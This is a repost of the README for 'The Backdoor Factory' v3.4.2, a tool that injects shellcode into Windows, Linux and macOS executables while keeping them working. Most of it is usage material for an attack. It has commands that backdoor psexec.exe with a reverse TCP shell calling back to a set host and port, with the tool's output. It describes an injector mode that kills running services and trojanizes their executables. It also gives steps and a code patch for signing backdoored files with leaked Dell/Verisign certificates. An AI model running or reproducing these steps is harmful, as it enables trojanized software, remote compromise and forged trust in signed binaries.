NOTICE: For security professionals and researchers only.
Changelog The Backdoor Factory (BDF)v3.4.2 1/11/2017:
* fix entry point instruction trucation (rare) and copyright updates.
BDFactory v3.4.0
BDFactory-v-3-3-0
Test Run Using PE Code Signing
The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.
Features:
+ PE Files
+ ELF Files
+ Mach-O Files
+ Overall
Dependencies:
Capstone, using the ‘next’ repo until it is the ‘master’ repo: https://github.com/aquynh/capstone/tree/next
Pefile, most recent: https://code.google.com/p/pefile/
INSTALL:
git clone https://github.com/secretsquirrel/the-backdoor-factory cd the-backdoor-factory ./install.sh
This will install Capstone with the ‘next’ repo and use pip to install pefile.
UPDATE:
./update.sh
Documentation and Presentation:
– http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory
– http://www.youtube.com/watch?v=LjUN9MACaTs
Sample Usage:
Patch an exe/dll using an existing code cave:
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp [*] In the backdoor module [*] Checking if binary is supported [*] Gathering file info [*] Reading win32 entry instructions [*] Looking for and setting selected shellcode [*] Creating win32 resume execution stub [*] Looking for caves that will fit the minimum shellcode length of 402 [*] All caves lengths: (402,) ############################################################ The following caves can be used to inject code and possibly continue execution. **Don't like what you see? Use jump, single, append, or ignore.** ############################################################ [*] Cave 1 length as int: 402 [*] Available caves: 1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507 2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492 3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501 4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492 5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505 6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498 7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495 8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505 9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559 10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559 ************************************************** [!] Enter your selection: 5 Using selection: 5 [*] Changing Section Flags [*] Patching initial entry instructions [*] Creating win32 resume execution stub [*] Overwriting certificate table pointer [*] psexec.exe backdooring complete File psexec.exe is in the 'backdoored' directory
Patch an exe/dll by adding a code section:
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a [*] In the backdoor module [*] Checking if binary is supported [*] Gathering file info [*] Reading win32 entry instructions [*] Looking for and setting selected shellcode [*] Creating win32 resume execution stub [*] Creating Code Cave - Adding a new section to the exe/dll for shellcode injection [*] Patching initial entry instructions [*] Creating win32 resume execution stub [*] Overwriting certificate table pointer [*] psexec.exe backdooring complete File psexec.exe is in the 'backdoored' directory
Patch a directory of exes:
./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a ...output too long for README...
User supplied shellcode:
msfpayload windows/exec CMD='calc.exe' R > calc.bin ./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.
Hunt and backdoor: Injector | Windows Only
The injector module will look for target executables to backdoor on disk. It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service. Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing. ./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow
Code Signing Certs Configure:
git clone git://git.code.sf.net/p/osslsigncode/osslsigncode osslsigncode ./autogen.sh ./configure make sudo make install Navigate to your BDF home directory. the-backdoor-factory git:(master) $ curl -O https://www.duosecurity.com/static/files/DellCertificates.zip mkdir certs unzip DellCertificates.zip -d certs
make a private key:
openssl pkcs12 -in certs/Verisign.pfx -nocerts -out certs/VerisignPrivateKey.pem Enter Import Password: t-span MAC verified OK Enter PEM pass phrase: moomoo Verifying - Enter PEM pass phrase: moomoo Let's test everything out: curl -O http://live.sysinternals.com/tcpview.exe # yay http osslsigncode extract-signature -in tcpview.exe -out sig.txt hexdump -C sig.txt
Test run:
osslsigncode -certs certs/Verisign.cer -key certs/VerisignPrivateKey.pem -n "Securitay" -in tcpview.exe -out tcpview_signed.exe -pass moomoo osslsigncode extract-signature -in tcpview_signed.exe -out sig.txt hexdump -C sig1.txt
Then now Open pebin.py in your favorite editor, and replace the code on line 1763(on behind self.binary.close() line 1759, save and test against your victim machine:
if self.ZERO_CERT is True:
# cert was removed earlier
p = subprocess.Popen(['osslsigncode', '-certs', 'certs/Verisign.cer', '-key', \
'certs/VerisignPrivateKey.pem', '-n', 'Security','-in', \
self.flItms["backdoorfile"], '-out', self.flItms["backdoorfile"], '-pass', 'moomoo'])
p.wait()Download : the-backdoor-factory-3.4.2.zip | the-backdoor-factory-3.4.2.tar.gz
Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr
Source : https://github.com/secretsquirrel/the-backdoor-factory | Our Post Before
NOTICE: For security professionals and researchers only.